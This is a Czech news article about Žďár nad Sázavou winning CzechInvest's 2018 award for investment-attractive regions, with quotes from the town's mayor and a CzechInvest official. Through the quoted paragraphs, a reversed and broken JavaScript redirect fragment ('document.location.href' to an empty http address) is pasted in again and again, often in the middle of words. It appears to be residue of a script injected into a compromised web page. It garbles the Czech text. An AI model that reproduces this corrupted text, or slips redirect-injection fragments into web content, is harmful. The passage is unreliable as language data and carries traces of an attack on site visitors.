Rainbow page separator

Žďár se stal Investičně atraktivním regionem roku 2018

Neděle, 9. června 2019

Žďár nad Sázavou / Žďár nad Sázavou získal titul Investičně atraktivní region roku 2018. Výsledky soutěže, která hodnotí přístup obcí a měst k rozvoji podnikatelského prostředí na jejich území, vyhlásila agentura CzechInvest ve čtvrtek 6. června ve Znojmě. Na 2. a 3. místě se umístila města Polná a Lanškroun. Žďár nad Sázavou zaujal odbornou porotu zejména promyšlenou strategií plánování, kterou vyvažuje podporu podnikatelů a vytváření dobrých životních podmínek pro obyvatele.
„Účast v soutěži je skvělý zdroj srovnání a inspirace. Chcete-li být nejlepší, musíte se těmi nejlepšími inspirovat. Zároveň získáte kontakty, povědomí o [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom, co funguje jinde, zpětnou vazbu, jak je na [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to ve srovnání se zbytkem republiky, co děláme dobře, kde máme příleži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tost pro zlepšení,“ uvedl starosta Žďáru nad Sázavou Martin Mrkos.
„České obce už si zvykly spolupracovat například na budování společných vodovodů, kanalizací nebo cyklostezek. Podobná spolupráce zaměřená na podporu investic je však stále ještě spíše výjimečná. Při[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom vybudování zázemí, které přiláká ty správné podnikatele, je předpokladem dalšího hospodářského růstu obcí,“ konsta[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toval ředitel jihomoravské kanceláře agentury CzechInvest Patrik Reichl.
Soutěž Investičně atraktivní region pořádá agentura CzechInvest třetím rokem, le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos se do ní přihlásilo 25 měst a obcí, do finále pos[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupilo osm z nich.